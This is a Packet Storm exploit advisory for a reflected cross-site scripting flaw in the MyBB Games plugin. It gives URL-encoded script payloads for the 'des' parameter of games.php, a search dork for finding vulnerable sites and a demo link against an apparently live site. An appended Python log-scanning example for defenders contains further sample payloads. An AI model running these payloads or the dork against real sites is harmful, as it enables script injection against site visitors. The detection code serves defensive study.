MyBB Games Cross Site Scripting

2013-05-06T00:00:00
ID PACKETSTORM:121529
Type packetstorm
Reporter Darksnipper
Modified 2013-05-06T00:00:00

Description

                                        
`################################################################  
#  
# Exploit Title : MyBB Games XSS Vulnerability  
#  
# Author : DarkSnipper ,Dream.Killer & Soul~inj3ctor  
#  
# Discovered By : Darksnipper@live.com  
# Home : http://cybercoders.org  
#  
# Link : http://mods.mybb.com/view/game-section  
#  
# Security Risk : High  
#  
# Version : All  
#  
# Tested on : GNU/Linux Ubuntu - Windows Server - win7  
#  
# Dork : intext:"Powered By mybb"  
#  
######################################################################  
#  
# Exploit : http://www.site.com/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E  
# or  
# http://www.site.com/scriptlocation/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E  
#  
# Demo : http://www.cyberhut.in/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+snipper%27%29%3C%2Fscript%3E  
# Greetz : Error Haxor, Dream.killer, Soul~Inj3ctor, Dr.v!ru$, Shadow008, H4x0rl1f3, X3o-1337, Force-ex, Retn0Hack, P4k-comm4nder, 1337, Madcode, Anons Dexter, Sen Haxor, Dr.z0mbie, Trick, Pak Cyber Army, Madleets, Z Company Hacking Crew, Badwares Team, Kashmir Cyber Army, Anonymous Pakistan, 3xp1r3 Cyber Army And All Muslim Hackers.  
################################  
`
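
Added example, not part of the original advisory: a log check a defender could run to find requests to `games.php` whose `des` parameter decodes to HTML metacharacters, as in the URLs above, including double-encoded variants. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed combined-format access-log lines; IPs and payloads are illustrative.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/May/2013:10:00:00 +0000] "GET /games.php?des=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/May/2013:10:01:00 +0000] "GET /scriptlocation/games.php?des=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/May/2013:10:02:00 +0000] "GET /games.php?des=puzzle+games HTTP/1.1" 200 4810',
    '198.51.100.8 - - [06/May/2013:10:03:00 +0000] "GET /index.php?des=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out of an attribute or open a tag.
MARKUP_RE = re.compile(r'[<>"\']')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_des_requests(lines):
    """Return (client_ip, decoded_des) for games.php requests carrying markup in des."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/games.php"):
            continue
        # parse_qs decodes once; fully_decode handles further encoding layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("des", []):
            value = fully_decode(raw)
            if MARKUP_RE.search(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_des_requests(SAMPLE_LOG):
        print(ip, repr(value))
```

The character class is deliberately broad, so a quote in a legitimate `des` value will also be reported and should be triaged by hand.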